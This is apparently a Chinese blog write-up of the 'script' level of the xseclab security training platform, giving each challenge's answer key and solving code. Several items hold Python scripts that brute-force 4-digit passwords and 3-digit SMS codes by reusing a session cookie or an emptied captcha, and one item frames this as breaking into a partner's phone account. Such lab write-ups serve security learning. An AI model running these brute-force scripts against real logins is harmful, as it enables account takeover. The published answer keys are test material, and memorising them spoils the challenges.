网络安全实验室|网络信息安全攻防学习平台(脚本关)

1. 小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!

地址: http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php

正确答案: yougotit_script_now

答案解析:我们发现点击后又重定向了,在burpsuite的target里面我们看该目录的回应数据,可以发现key

如图:

网络安全实验室|网络信息安全攻防学习平台(脚本关)

 

2.快速口算:小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢? 

地址: http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php

正确答案: 123iohHKHJ%^&*(jkh

答案解析:这种需要使用脚本来获取key,因为只有2秒,不可能人来操作。python代码如下:

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. from selenium import webdriver  
  4. dirver=webdriver.Chrome()  
  5.   
  6. url="http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"  
  7. dirver.get(url)#使用Chrome打开地址  
  8. res=dirver.page_source#读取页面代码  
  9. print("页面代码:\n%s" %res)  
  10. num=re.findall(r'[0-9+*()]+[)]',res)#获取计算式  
  11. result=eval(num[0].strip())#计算结果  
  12. print("计算结果:%s"%result)  
  13. dirver.find_element_by_name( "v").send_keys(result)#搜索输入框输入result  
  14. dirver.find_element_by_xpath( "html/body/form").submit()#点击提交按钮  
  15. res=dirver.page_source#读取页面代码  
  16. print("新页面代码:\n%s" %res)  

 

3.这个题目是空的

Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)

正确答案: null

答案解析:为空,而且必须输入,当然是null啊!

 

4.怎么就是弹不出key呢? 

提交说明:提交前14个字符即可过关 

地址: http://lab1.xseclab.com/xss3_5dcdde90bbe55087eb3514405972b1a6/index.php

正确答案: slakfjteslkjsd

答案解析:查看源码,发现前面有一个a函数返回失败,去掉这些返回为false的函数,然后在稍微修改下:

view plaincopy to clipboard

  1. <html>  
  2.     <head>  
  3.         <meta http-equiv="content-type" content="text/html;charset=utf-8">  
  4.         <script>  
  5.             var a=function (){  
  6.                var b=function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1s(1e(p,a,c,k,e,r){e=1e(c){1d(c<a?\'\':e(1p(c/a)))+((c=c%a)>1q?1f.1j(c+1k):c.1n(1o))};1g(!\'\'.1h(/^/,1f)){1i(c--)r[e(c)]=k[c]||e(c);k=[1e(e){1d r[e]}];e=1e(){1d\'\\\\w+\'};c=1};1i(c--)1g(k[c])p=p.1h(1l 1m(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1d p}(\'Y(R(p,a,c,k,e,r){e=R(c){S(c<a?\\\'\\\':e(18(c/a)))+((c=c%a)>17?T.16(c+15):c.12(13))};U(!\\\'\\\'.V(/^/,T)){W(c--)r[e(c)]=k[c]||e(c);k=[R(e){S r[e]}];e=R(){S\\\'\\\\\\\\w+\\\'};c=1};W(c--)U(k[c])p=p.V(Z 11(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c]);S p}(\\\'G(B(p,a,c,k,e,r){e=B(c){A c.L(a)};E(!\\\\\\\'\\\\\\\'.C(/^/,F)){D(c--)r[e(c)]=k[c]||e(c);k=[B(e){A r[e]}];e=B(){A\\\\\\\'\\\\\\\\\\\\\\\\w+\\\\\\\'};c=1};D(c--)E(k[c])p=p.C(I J(\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\'+e(c)+\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\',\\\\\\\'g\\\\\\\'),k[c]);A p}(\\\\\\\'t(h(p,a,c,k,e,r){e=o;n(!\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\'.m(/^/,o)){l(c--)r[c]=k[c]||c;k=[h(e){f r[e]}];e=h(){f\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\'};c=1};l(c--)n(k[c])p=p.m(q s(\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\'+e(c)+\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\',\\\\\\\\\\\\\\\'g\\\\\\\\\\\\\\\'),k[c]);f p}(\\\\\\\\\\\\\\\'1 3="6";1 4="7";1 5="";8(1 2=0;2<9;2++){5+=3+4}\\\\\\\\\\\\\\\',j,j,\\\\\\\\\\\\\\\'|u|i|b|c|d|v|x|y|j\\\\\\\\\\\\\\\'.z(\\\\\\\\\\\\\\\'|\\\\\\\\\\\\\\\'),0,{}))\\\\\\\',H,H,\\\\\\\'|||||||||||||||A||B||M||D|C|E|F||I||J|G|N|O||P|Q|K\\\\\\\'.K(\\\\\\\'|\\\\\\\'),0,{}))\\\',X,X,\\\'||||||||||||||||||||||||||||||||||||S|R|V|W|U|T|Y|13|Z|11|14|12|10|19|1a|1b|1c\\\'.14(\\\'|\\\'),0,{}))\',1t,1u,\'|||||||||||||||||||||||||||||||||||||||||||||||||||||1e|1d|1f|1g|1h|1i|1v|1s|1l||1m|1n|1o|1r|1k|1j|1q|1p|1w|1x|1y|1z\'.1r(\'|\'),0,{}))',62,98,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|String|if|replace|while|fromCharCode|29|new|RegExp|toString|36|parseInt|35|split|eval|62|75|53|var|slakfj|teslkjsdflk|for'.split('|'),0,{});  
  7.                var d=eval(b);  
  8.                //alert("key is first 14 chars"+d);  
  9.                document.getElementById('show').innerHTML='key is :'+d.substr(0,14);  
  10.             }  
  11.         </script>  
  12.     </head>  
  13.     <body>  
  14.         <a href="javascript:a();">_点击之后怎么没反应呢?说好的弹窗呢?__</a>  
  15.         <p id="show"></p>  
  16.     </body>  
  17. </html>  

 

5.逗比验证码第一期:逗比的验证码,有没有难道不一样吗?  

地址: http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php

正确答案: LJLJL789sdf#@sd

答案解析:这题想让我们暴力破解,而人工来破解的花至少2小时把,所以我用python来破解,代码如下:

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. s=requests.Session()  
  4. url="http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"  
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}  
  6. for num in range(1000,10000):  
  7.            data={'username':'admin','pwd':num,'vcode':'GNZX','submit':'submit'}  
  8.            res=s.post(url,data=data,headers=head).content.decode('utf-8')  
  9.            if u'pwd error' in res:  
  10.                       print('正在尝试',num,'------密码错误!')  
  11.            if u'vcode error' in res:  
  12.                       print('验证码错误!')  
  13.                       break  
  14.            if u'error' not in res:  
  15.                       print(num,'----密码破解成功!')  
  16.                       print(res)  
  17.                       break  

 

6.逗比的验证码第二期:验证便失效的验证码 

地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php

正确答案: LJLJL789ss33fasvxcvsdf#@sd

答案解析:将验证码改为空即可

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. s=requests.Session()  
  4. url="http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"  
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}  
  6. for num in range(1000,10000):  
  7.            data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}  
  8.            res=s.post(url,data=data,headers=head).content.decode('utf-8')  
  9.            if u'pwd error' in res:  
  10.                       print('正在尝试',num,'------密码错误!')  
  11.            if u'vcode error' in res:  
  12.                       print('验证码错误!')  
  13.                       break  
  14.            if u'error' not in res:  
  15.                       print(num,'----密码破解成功!')  
  16.                       print(res)  
  17.                       break  

 

7.逗比的验证码第三期:验证便失效的验证码 

地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php

正确答案: LJLJLfuckvcodesdf#@sd

答案解析:将验证码去除,cookie改为session即可

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. s=requests.Session()  
  4. url="http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"  
  5. head={'session':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}  
  6. for num in range(1000,10000):  
  7.            data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}  
  8.            res=s.post(url,data=data,headers=head).content.decode('utf-8')  
  9.            if u'pwd error' in res:  
  10.                       print('正在尝试',num,'------密码错误!')  
  11.            if u'vcode error' in res:  
  12.                       print('验证码错误!')  
  13.                       break  
  14.            if u'error' not in res:  
  15.                       print(num,'----密码破解成功!')  
  16.                       print(res)  
  17.                       break  

 

8.微笑一下就能通过拉!尼玛,碰到这样的题我能笑得出来嘛...  

地址: http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php

正确答案: hkjasfhsa*&IUHKUH

答案解析:查看源代码我们可以发现一个超链接,打开这个超链接是PHP代码,观察后发现from是POST提交,PHP处理是GET,呵呵(●'?'●) 微笑

在后缀里面加?^.^=data:,(●'?'●) 即可

 

9. 逗比的手机验证码:你的手机号码是13388886666,验证码将会以弹窗的形式给出

地址: http://lab1.xseclab.com/vcode5_mobi_5773f3def9f77f439e058894cefc42a8/

正确答案: LJLJLGod!@@sd

答案解析:傻吊题啊,获取验证码登陆提示13388886667登陆,重新来就是

 

10.基情燃烧的岁月:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! 闺蜜手机号码:13388886666 

地址: http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/

正确答案: 13399999999

答案解析:用python来破解验证码:

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. s=requests.Session()  
  4. url="http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"  
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}  
  6. for num in range(100,1000):  
  7.            data={'username':'13388886666','vcode':num,'Login':'submit'}  
  8.            res=s.post(url,data=data,headers=head).content.decode('utf-8')  
  9.            if u'vcode or username error' in res:  
  10.                       print('正在尝试',num,'------验证码错误!')  
  11.            if u'error' not in res:  
  12.                       print(num,'----验证码破解成功!')  
  13.                       print(res)  
  14.                       break  

但是不知道为什么答案还是错的!

 

11.验证码识别 Tips:验证码依然是3位数

地址: http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php

正确答案: 

答案解析:暂时没弄出来

 

12.XSS基础:很容易就可以过关.XSS类题目必须在平台登录才能进行.登录地址请参考左侧<子系统>

地址: http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php

正确答案:

 

答案解析:暂时没弄出来

  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远孤独的菜鸟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值